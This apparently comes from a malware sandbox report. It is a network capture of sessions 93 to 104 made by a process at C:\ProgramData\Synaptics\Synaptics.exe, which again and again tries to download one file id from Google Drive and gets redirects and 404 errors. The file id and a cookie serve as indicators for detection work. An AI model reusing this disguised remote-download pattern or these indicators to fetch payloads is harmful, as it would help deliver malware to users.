                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:05 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:41:05 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="KsZSHbsn2Ut6MN4gLA6XCA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:41:05 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      93 | 192.168.2.6 | 50047 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:04 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:05 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC55mzfMvGiXsTDOWC66KV_2Pn1lCS4KMAuWNZWC4l2JgP6g-N-225GhSgJfJq2z0fs-jDJkYdg
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:05 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-90saIUCqHa3RaD2Jl8l3kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:41:05 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:41:05 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="mczbxL8zSM7oawmB8i6KBw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:41:05 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      94 | 192.168.2.6 | 50046 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:04 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:05 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:05 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2nk5PCzaFrO3QgAL6q_72Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      95 | 192.168.2.6 | 50058 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:05 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      96 | 192.168.2.6 | 50061 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:05 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      97 | 192.168.2.6 | 50062 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:05 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      98 | 192.168.2.6 | 50071 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:06 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:41:06 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:06 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Sydr4g1KBvw3yS0gfISkWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      99 | 192.168.2.6 | 50072 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:41:06 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
2024-12-30 10:41:06 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:06 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HTVMlteyrQGoz4ntopNg4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.6 | 50080 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:41:07 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
2024-12-30 10:41:07 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:07 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-n2ZrpKsqCWRBcj7oDh2pwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.6 | 50082 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:41:07 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
2024-12-30 10:41:08 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:07 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-5sLfxMSehitoNBVOspV1Dg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.6 | 50079 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:41:07 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
2024-12-30 10:41:07 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC5Wzt7tSMABsoDAE84dT-0QLNTX8nq8OlzPUJE6xflE2rPXJKqDgemGV6PW41PJG-JzmfGK8Ns
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:07 GMT
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-PP3A5bt3FxO7y234y231sQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
2024-12-30 10:41:07 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:07 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="bD5Zp_rX77eer_mMD1NAlQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:07 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.6 | 50081 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:41:07 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
2024-12-30 10:41:08 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7i12liUKtaDnQYvTLzyehHNKiQ5l1w4Zx-88tWmS3pEMTt_lc1CX5iEF_7_kNg9BO-
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:41:08 GMT
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-VoOUDqQX_woJbgsWpFf5mw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
2024-12-30 10:41:08 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:41:08 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="gOgX9IaiHbqZSgK-r7OQnA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:41:08 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.6 | 50097 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:41:16 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
2024-12-30 10:41:16 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7pQmvK7rIgovYK0kF5mtey_G-PzyALnWGOpQnJFItVyAcUpL3uR8rNFyfvevBFCvOR
                                                                                                                      Content-Type: text/html; charset=utf-8
